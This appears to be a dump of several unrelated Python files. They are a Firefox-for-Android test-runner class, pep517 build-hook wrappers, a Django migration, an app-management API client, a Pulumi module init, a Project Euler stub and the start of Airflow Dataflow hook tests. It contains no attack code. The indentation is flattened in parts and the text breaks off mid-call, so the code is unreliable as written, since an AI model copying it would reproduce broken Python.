"""
Name of app to run on emulator.
"""
if self._package_name is None:
self._package_name = "org.mozilla.fennec"
user = os.getenv("USER")
if user:
self._package_name += "_" + user
return self._package_name
def start(self, **kwargs):
if self.marionette_port is None:
self.marionette_port = get_free_port()
env = {}
env["MOZ_CRASHREPORTER"] = "1"
env["MOZ_CRASHREPORTER_SHUTDOWN"] = "1"
env["MOZ_DISABLE_NONLOCAL_CONNECTIONS"] = "1"
env["STYLO_THREADS"] = str(self.stylo_threads)
if self.chaos_mode_flags is not None:
env["MOZ_CHAOSMODE"] = str(self.chaos_mode_flags)
preferences = self.load_prefs()
self.profile = FirefoxProfile(preferences=preferences)
self.profile.set_preferences({"marionette.port": self.marionette_port,
"dom.disable_open_during_load": False,
"places.history.enabled": False,
"dom.send_after_paint_to_content": True,
"network.preload": True})
if self.test_type == "reftest":
self.logger.info("Setting android reftest preferences")
self.profile.set_preferences({"browser.viewport.desktopWidth": 800,
# Disable high DPI
"layout.css.devPixelsPerPx": "1.0",
# Ensure that the full browser element
# appears in the screenshot
"apz.allow_zooming": False,
"android.widget_paints_background": False,
# Ensure that scrollbars are always painted
"layout.testing.overlay-scrollbars.always-visible": True})
if self.install_fonts:
self.logger.debug("Copying Ahem font to profile")
font_dir = os.path.join(self.profile.profile, "fonts")
if not os.path.exists(font_dir):
os.makedirs(font_dir)
with open(os.path.join(self.tests_root, "fonts", "Ahem.ttf"), "rb") as src:
with open(os.path.join(font_dir, "Ahem.ttf"), "wb") as dest:
dest.write(src.read())
if self.leak_check and kwargs.get("check_leaks", True):
self.leak_report_file = os.path.join(self.profile.profile, "runtests_leaks.log")
if os.path.exists(self.leak_report_file):
os.remove(self.leak_report_file)
env["XPCOM_MEM_BLOAT_LOG"] = self.leak_report_file
else:
self.leak_report_file = None
if self.ca_certificate_path is not None:
self.setup_ssl()
debug_args, cmd = browser_command(self.package_name,
self.binary_args if self.binary_args else [] +
[cmd_arg("marionette"), "about:blank"],
self.debug_info)
self.runner = FennecEmulatorRunner(app=self.package_name,
profile=self.profile,
cmdargs=cmd[1:],
env=env,
symbols_path=self.symbols_path,
serial=self.device_serial,
# TODO - choose appropriate log dir
logdir=os.getcwd(),
process_class=ProcessHandler,
process_args={"processOutputLine": [self.on_output]})
self.logger.debug("Starting %s" % self.package_name)
# connect to a running emulator
self.runner.device.connect()
write_hosts_file(self.config, self.runner.device.device)
self.runner.stop()
self.runner.start(debug_args=debug_args, interactive=self.debug_info and self.debug_info.interactive)
self.runner.device.device.forward(
local="tcp:{}".format(self.marionette_port),
remote="tcp:{}".format(self.marionette_port))
self.logger.debug("%s Started" % self.package_name)
def stop(self, force=False):
if self.runner is not None:
if (self.runner.device.connected and
len(self.runner.device.device.list_forwards()) > 0):
try:
self.runner.device.device.remove_forwards(
"tcp:{}".format(self.marionette_port))
except Exception:
self.logger.warning("Failed to remove port forwarding")
# We assume that stopping the runner prompts the
# browser to shut down. This allows the leak log to be written
self.runner.stop()
self.logger.debug("stopped")
def check_crash(self, process, test):
if not os.environ.get("MINIDUMP_STACKWALK", "") and self.stackwalk_binary:
os.environ["MINIDUMP_STACKWALK"] = self.stackwalk_binary
return self.runner.check_for_crashes()
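# Rough lifecycle sketch (illustrative only; the constructor kwargs below are
# assumed to come from wptrunner's command-line layer and the elided ones are
# stand-ins, not part of this module):
#
#   browser = FennecBrowser(logger, prefs_root, "testharness",
#                           tests_root="/path/to/wpt", install_fonts=False,
#                           stackwalk_binary=None, ...)
#   browser.start()  # pushes /etc/hosts to the device, launches Fennec,
#                    # and forwards the Marionette port to the host
#   browser.stop()   # removes the port forward and stops the runner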
|
import threading
from contextlib import contextmanager
import os
from os.path import dirname, abspath, join as pjoin
import shutil
from subprocess import check_call, check_output, STDOUT
import sys
from tempfile import mkdtemp
from . import compat
_in_proc_script = pjoin(dirname(abspath(__file__)), '_in_process.py')
@contextmanager
def tempdir():
td = mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
class BackendUnavailable(Exception):
"""Will be raised if the backend cannot be imported in the hook process."""
def __init__(self, traceback):
self.traceback = traceback
class BackendInvalid(Exception):
"""Will be raised if the backend is invalid."""
def __init__(self, backend_name, backend_path, message):
self.backend_name = backend_name
self.backend_path = backend_path
self.message = message
class HookMissing(Exception):
"""Will be raised on missing hooks."""
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
class UnsupportedOperation(Exception):
"""May be raised by build_sdist if the backend indicates that it can't."""
def __init__(self, traceback):
self.traceback = traceback
def default_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""The default method of calling the wrapper subprocess."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_call(cmd, cwd=cwd, env=env)
def quiet_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""A method of calling the wrapper subprocess while suppressing output."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_output(cmd, cwd=cwd, env=env, stderr=STDOUT)
def norm_and_check(source_tree, requested):
"""Normalise and check a backend path.
Ensure that the requested backend path is specified as a relative path,
and resolves to a location under the given source tree.
Return an absolute version of the requested path.
"""
if os.path.isabs(requested):
raise ValueError("paths must be relative")
abs_source = os.path.abspath(source_tree)
abs_requested = os.path.normpath(os.path.join(abs_source, requested))
# We have to use commonprefix for Python 2.7 compatibility. So we
# normalise case to avoid problems because commonprefix is a character
# based comparison :-(
norm_source = os.path.normcase(abs_source)
norm_requested = os.path.normcase(abs_requested)
if os.path.commonprefix([norm_source, norm_requested]) != norm_source:
raise ValueError("paths must be inside source tree")
return abs_requested
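# Illustrative behaviour (hypothetical paths, shown as comments only):
#   norm_and_check('/srv/project', 'backends')      -> '/srv/project/backends'
#   norm_and_check('/srv/project', '/abs/backends') -> ValueError (absolute path)
#   norm_and_check('/srv/project', '../elsewhere')  -> ValueError (escapes tree)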
class Pep517HookCaller(object):
"""A wrapper around a source directory to be built with a PEP 517 backend.
source_dir : The path to the source directory, containing pyproject.toml.
build_backend : The build backend spec, as per PEP 517, from
pyproject.toml.
backend_path : The backend path, as per PEP 517, from pyproject.toml.
runner : A callable that invokes the wrapper subprocess.
The 'runner', if provided, must expect the following:
cmd : a list of strings representing the command and arguments to
execute, as would be passed to e.g. 'subprocess.check_call'.
cwd : a string representing the working directory that must be
used for the subprocess. Corresponds to the provided source_dir.
extra_environ : a dict mapping environment variable names to values
which must be set for the subprocess execution.
"""
def __init__(
self,
source_dir,
build_backend,
backend_path=None,
runner=None,
):
if runner is None:
runner = default_subprocess_runner
self.source_dir = abspath(source_dir)
self.build_backend = build_backend
if backend_path:
backend_path = [
norm_and_check(self.source_dir, p) for p in backend_path
]
self.backend_path = backend_path
self._subprocess_runner = runner
# TODO: Is this over-engineered? Maybe frontends only need to
# set this when creating the wrapper, not on every call.
@contextmanager
def subprocess_runner(self, runner):
"""A context manager for temporarily overriding the default subprocess
runner.
"""
prev = self._subprocess_runner
self._subprocess_runner = runner
yield
self._subprocess_runner = prev
def get_requires_for_build_wheel(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.:
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_wheel', {
'config_settings': config_settings
})
def prepare_metadata_for_build_wheel(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a *.dist-info folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build a wheel,
and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_wheel', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_wheel(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build a wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_wheel' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_wheel', and the same metadata_directory is
used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_wheel', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_sdist(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.:
["setuptools >= 26"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_sdist', {
'config_settings': config_settings
})
def build_sdist(self, sdist_directory, config_settings=None):
"""Build an sdist from this project.
Returns the name of the newly created file.
This calls the 'build_sdist' backend hook in a subprocess.
"""
return self._call_hook('build_sdist', {
'sdist_directory': abspath(sdist_directory),
'config_settings': config_settings,
})
def _call_hook(self, hook_name, kwargs):
# On Python 2, pytoml returns Unicode values (which is correct) but the
# environment passed to check_call needs to contain string values. We
# convert here by encoding using ASCII (the backend can only contain
# letters, digits and _, . and : characters, and will be used as a
# Python identifier, so non-ASCII content is wrong on Python 2 in
# any case).
# For backend_path, we use sys.getfilesystemencoding.
if sys.version_info[0] == 2:
build_backend = self.build_backend.encode('ASCII')
else:
build_backend = self.build_backend
extra_environ = {'PEP517_BUILD_BACKEND': build_backend}
if self.backend_path:
backend_path = os.pathsep.join(self.backend_path)
if sys.version_info[0] == 2:
backend_path = backend_path.encode(sys.getfilesystemencoding())
extra_environ['PEP517_BACKEND_PATH'] = backend_path
with tempdir() as td:
hook_input = {'kwargs': kwargs}
compat.write_json(hook_input, pjoin(td, 'input.json'),
indent=2)
# Run the hook in a subprocess
self._subprocess_runner(
[sys.executable, _in_proc_script, hook_name, td],
cwd=self.source_dir,
extra_environ=extra_environ
)
data = compat.read_json(pjoin(td, 'output.json'))
if data.get('unsupported'):
raise UnsupportedOperation(data.get('traceback', ''))
if data.get('no_backend'):
raise BackendUnavailable(data.get('traceback', ''))
if data.get('backend_invalid'):
raise BackendInvalid(
backend_name=self.build_backend,
backend_path=self.backend_path,
message=data.get('backend_error', '')
)
if data.get('hook_missing'):
raise HookMissing(hook_name)
return data['return_val']
class LoggerWrapper(threading.Thread):
"""
Read messages from a pipe and redirect them
to a logger (see python's logging module).
"""
def __init__(self, logger, level):
threading.Thread.__init__(self)
self.daemon = True
self.logger = logger
self.level = level
# create the pipe and reader
self.fd_read, self.fd_write = os.pipe()
self.reader = os.fdopen(self.fd_read)
self.start()
def fileno(self):
return self.fd_write
@staticmethod
def remove_newline(msg):
return msg[:-1] if msg.endswith(os.linesep) else msg
def run(self):
for line in self.reader:
self._write(self.remove_newline(line))
def _write(self, message):
self.logger.log(self.level, message)
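# Usage sketch (added for illustration; 'source_dir' is a hypothetical project
# directory containing pyproject.toml with a setuptools backend, and nothing
# below is part of this module's public API):
def _example_build_wheel(source_dir, wheel_dir='dist'):
    hooks = Pep517HookCaller(source_dir, build_backend='setuptools.build_meta')
    # Temporarily swap in the quiet runner so backend output is captured
    # instead of being written to the console.
    with hooks.subprocess_runner(quiet_subprocess_runner):
        requires = hooks.get_requires_for_build_wheel()
        wheel_name = hooks.build_wheel(wheel_dir)
    return requires, wheel_name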
|
# Generated by Django 2.1.1 on 2018-09-30 01:06
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Contact",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("listing", models.CharField(max_length=200)),
("listing_id", models.IntegerField()),
("name", models.CharField(max_length=200)),
("email", models.CharField(max_length=100)),
("phone", models.CharField(max_length=100)),
("message", models.TextField(blank=True)),
(
"contact_date",
models.DateTimeField(blank=True, default=datetime.datetime.now),
),
("user_id", models.IntegerField(blank=True)),
],
),
]
|
import requests
import json
from config import config
from api_client.url_helpers.internal_app_url import get_create_internal_app_from_blob_url, get_edit_assignment_url
from api_client.url_helpers.internal_app_url import get_retire_app_url, get_internal_app_assignment_url
from Logs.log_configuration import configure_logger
from models.api_header_model import RequestHeader
log = configure_logger('default')
def create_app(transaction_data):
"""
Creates a new application based on the transaction data model
:param transaction_data: Transaction data model
    :return: Tuple of (success, application ID, app version, bundle ID);
             (False, 0, 0, '') in case of failure
"""
api_url = get_create_internal_app_from_blob_url()
headers = RequestHeader().header
api_body = {
'TransactionId': str(transaction_data.transaction_id),
'Description': transaction_data.description,
'BlobId': transaction_data.blob_id,
'PushMode': transaction_data.push_mode,
'ApplicationName': transaction_data.application_name,
'FileName': transaction_data.file_name,
'DeviceType': transaction_data.device_type,
'EnableProvisioning': transaction_data.enable_provisioning,
'UploadViaLink': transaction_data.upload_via_link,
'LocationGroupId': config.TENANT_GROUP_ID,
'SupportedModels': transaction_data.supported_models,
'BundleId': None,
'ActualFileVersion': None,
'AppVersion': transaction_data.app_version,
'SupportedProcessorArchitecture': None,
'MsiDeploymentParamModel': {'RetryCount': None,
'InstallTimeoutInMinutes': None,
'CommandLineArguments': None,
'RetryIntervalInMinutes': None},
'DeploymentOptions': None,
'IsDependencyFile': False,
'FilesOptions': None,
'CarryOverAssignments': transaction_data.carry_over_assignments
}
payload = json.dumps(api_body)
try:
response = requests.post(api_url, headers=headers, data=payload)
if not response.ok:
log.debug(f'{response.status_code}, {response.reason}, {response.content}') # HTTP
return False, 0, 0, ''
else:
response_data = json.loads(response.content)
app_version = response_data['AppVersion']
bundle_id = response_data['BundleId']
log.debug('Application saved with Application ID {id}'.format(id=response_data['Id']['Value']))
return True, response_data['Id']['Value'], app_version, bundle_id
    except Exception as e:
        log.error('Application creation failed for transactionId: {tid} with error {e}'
                  .format(tid=transaction_data.transaction_id, e=str(e)))
        return False, 0, 0, ''
def retire_app(app_id):
"""
Retires the app based on the Application ID
:param app_id: Application ID
:return: True/False indicating Success/Failure
"""
api_url = get_retire_app_url(app_id)
headers = RequestHeader().header
try:
response = requests.post(api_url, headers=headers)
log.debug(f'{response.status_code}, {response.reason}, {response.content}')
        return response.ok
    except Exception as e:
        log.error('Application retire failed for Application ID {id} with error {e}'.format(id=app_id, e=str(e)))
        return False
def add_assignments(app_id, app_assignment_model):
"""
Assigns the app created to specified smart groups
:param app_id: Application ID
:param app_assignment_model: Assignment Model
:return: True/False indicating Success/Failure
"""
api_url = get_internal_app_assignment_url(app_id)
headers = RequestHeader().header
api_body = {
'SmartGroupIds': app_assignment_model.smart_group_ids,
'DeploymentParameters': app_assignment_model.deployment_parameters
}
payload = json.dumps(api_body)
try:
response = requests.post(api_url, headers=headers, data=payload)
log.debug(f'{response.status_code}, {response.reason}, {response.content}')
if not response.ok:
return False
else:
log.debug('App with ID: {id} assigned to smartgroups {groups}'
.format(id=app_id, groups=app_assignment_model.smart_group_ids))
return True
    except Exception as e:
        log.error('Application assignment failed for Application: {id} with error {e}'.format(id=app_id, e=str(e)))
        return False
def edit_app_assignment(app_id, app_assignment_model, assignment_group_for_deletion):
"""
Edits the app assignment for given Application ID
:param app_id: Application ID
:param app_assignment_model: App assignment model
    :param assignment_group_for_deletion: Smart group IDs that have to be deleted from the assignment
:return: True/False indicating Success/Failure
"""
api_url = get_edit_assignment_url(app_id)
headers = RequestHeader().header
api_body = {
'SmartGroupIds': app_assignment_model.smart_group_ids,
'SmartGroupIdsForDeletion': assignment_group_for_deletion,
'DeploymentParameters': app_assignment_model.deployment_parameters
}
payload = json.dumps(api_body)
try:
response = requests.put(api_url, headers=headers, data=payload)
log.debug(f'{response.status_code}, {response.reason}')
if not response.ok:
return False
else:
log.debug('App(AppID : {id}) assignment updated with smartgroups {groups}'
.format(id=app_id, groups=app_assignment_model.smart_group_ids))
return True
    except Exception as e:
        log.error('Application edit assignment failed for Application: {id} with error {e}'.format(id=app_id, e=str(e)))
        return False
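# Usage sketch (illustrative; 'transaction_data' and 'assignment_model' stand
# for the caller-supplied models, which are not defined in this module):
#   ok, app_id, app_version, bundle_id = create_app(transaction_data)
#   if ok:
#       add_assignments(app_id, assignment_model)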
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from .activity import *
from .get_activity import *
from .get_state_machine import *
from .state_machine import *
from ._inputs import *
from . import outputs
|
# Solution of;
# Project Euler Problem 72: Counting fractions
# https://projecteuler.net/problem=72
#
# Consider the fraction, n/d, where n and d are positive integers. If n<d and
# HCF(n,d)=1, it is called a reduced proper fraction. If we list the set of
# reduced proper fractions for d ≤ 8 in ascending order of size, we get: 1/8,
# 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5, 5/8, 2/3, 5/7,
# 3/4, 4/5, 5/6, 6/7, 7/8. It can be seen that there are 21 elements in this
# set. How many elements would be contained in the set of reduced proper
# fractions for d ≤ 1,000,000?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
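# A sketch of an actual solution (not wired into timed.caller below): the
# number of reduced proper fractions for d <= limit equals the sum of Euler's
# totient phi(d) over 2 <= d <= limit, computed here with a sieve.
def count_reduced_fractions(limit=1_000_000):
    phi = list(range(limit + 1))
    for p in range(2, limit + 1):
        if phi[p] == p:  # p is prime, so apply the factor (1 - 1/p)
            for multiple in range(p, limit + 1, p):
                phi[multiple] -= phi[multiple] // p
    return sum(phi[2:])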
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 72
timed.caller(dummy, n, i, prob_id)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import shlex
import subprocess
import unittest
from typing import Any, Dict
from unittest import mock
from unittest.mock import MagicMock
from uuid import UUID
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.apache.beam.hooks.beam import BeamCommandRunner, BeamHook
from airflow.providers.google.cloud.hooks.dataflow import (
DEFAULT_DATAFLOW_LOCATION,
DataflowHook,
DataflowJobStatus,
DataflowJobType,
_DataflowJobsController,
_fallback_to_project_id_from_variables,
process_line_and_extract_dataflow_job_id_callback,
)
DEFAULT_RUNNER = "DirectRunner"
BEAM_STRING = 'airflow.providers.apache.beam.hooks.beam.{}'
TASK_ID = 'test-dataflow-operator'
JOB_NAME = 'test-dataflow-pipeline'
MOCK_UUID = UUID('cf4a56d2-8101-4217-b027-2af6216feb48')
MOCK_UUID_PREFIX = str(MOCK_UUID)[:8]
UNIQUE_JOB_NAME = f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}'
TEST_TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'apache_beam.examples.wordcount'
JAR_FILE = 'unitest.jar'
JOB_CLASS = 'com.example.UnitTest'
PY_OPTIONS = ['-m']
DATAFLOW_VARIABLES_PY = {'project': 'test', 'staging_location': 'gs://test/staging', 'labels': {'foo': 'bar'}}
DATAFLOW_VARIABLES_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'labels': {'foo': 'bar'},
}
RUNTIME_ENV = {
'additionalExperiments': ['exp_flag1', 'exp_flag2'],
'additionalUserLabels': {'name': 'wrench', 'mass': '1.3kg', 'count': '3'},
'bypassTempDirValidation': {},
'ipConfiguration': 'WORKER_IP_PRIVATE',
'kmsKeyName': (
'projects/TEST_PROJECT_ID/locations/TEST_LOCATIONS/keyRings/TEST_KEYRING/cryptoKeys/TEST_CRYPTOKEYS'
),
'maxWorkers': 10,
'network': 'default',
'numWorkers': 2,
'serviceAccountEmail': 'test@apache.airflow',
'subnetwork': 'regions/REGION/subnetworks/SUBNETWORK',
'tempLocation': 'gs://test/temp',
'workerRegion': "test-region",
'workerZone': 'test-zone',
'zone': 'us-central1-f',
'machineType': 'n1-standard-1',
}
BASE_STRING = 'airflow.providers.google.common.hooks.base_google.{}'
DATAFLOW_STRING = 'airflow.providers.google.cloud.hooks.dataflow.{}'
TEST_PROJECT = 'test-project'
TEST_JOB_ID = 'test-job-id'
TEST_LOCATION = 'custom-location'
DEFAULT_PY_INTERPRETER = 'python3'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_PROJECT_ID = 'test-project-id'
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB_ID = 'test-job-id'
DEFAULT_CANCEL_TIMEOUT = 5 * 60
class TestFallbackToVariables(unittest.TestCase):
def test_support_project_id_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(project_id="TEST")
mock_instance.assert_called_once_with(project_id="TEST")
def test_support_project_id_from_variable_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(variables={'project': "TEST"})
mock_instance.assert_called_once_with(project_id='TEST', variables={})
def test_raise_exception_on_conflict(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException,
match="The mutually exclusive parameter `project_id` and `project` key in `variables` parameter "
"are both present\\. Please remove one\\.",
):
FixtureFallback().test_fn(variables={'project': "TEST"}, project_id="TEST2")
def test_raise_exception_on_positional_argument(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException, match="You must use keyword arguments in this methods rather than positional"
):
FixtureFallback().test_fn({'project': "TEST"}, "TEST2")
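# Taken together, the cases above pin down the decorator's contract (a reading
# of the tests, not of the implementation itself):
#   f(project_id="TEST")                      -> project_id passed through
#   f(variables={'project': "TEST"})          -> promoted to project_id, key removed
#   f(variables={'project': X}, project_id=Y) -> AirflowException (conflict)
#   f({'project': X}, "Y")                    -> AirflowException (positional args)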
def mock_init(
self,
gcp_conn_id,
delegate_to=None,
impersonation_chain=None,
): # pylint: disable=unused-argument
pass
class TestDataflowHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
self.dataflow_hook.beam_hook = MagicMock()
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.DataflowHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.build")
def test_dataflow_client_creation(self, mock_build, mock_authorize):
result = self.dataflow_hook.get_conn()
mock_build.assert_called_once_with(
'dataflow', 'v1b3', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables["region"] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_multiple_extra_packages(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables['extra-package'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
